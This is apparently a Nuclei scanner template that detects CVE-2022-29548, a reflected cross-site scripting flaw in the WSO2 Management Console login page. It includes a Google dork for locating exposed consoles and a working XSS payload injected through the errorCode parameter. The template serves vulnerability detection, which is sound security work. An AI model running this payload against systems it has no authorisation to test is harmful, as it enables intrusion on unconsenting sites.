43 lines
1.1 KiB
YAML
43 lines
1.1 KiB
YAML
id: CVE-2022-29548
|
|
|
|
info:
|
|
name: WSO2 Management Console - Reflected XSS
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
A reflected XSS issue exists in the Management Console of several WSO2 products.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
|
|
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-29548
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
google-dork: inurl:"carbon/admin/login"
|
|
verified: "true"
|
|
tags: cve,cve2022,wso2,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|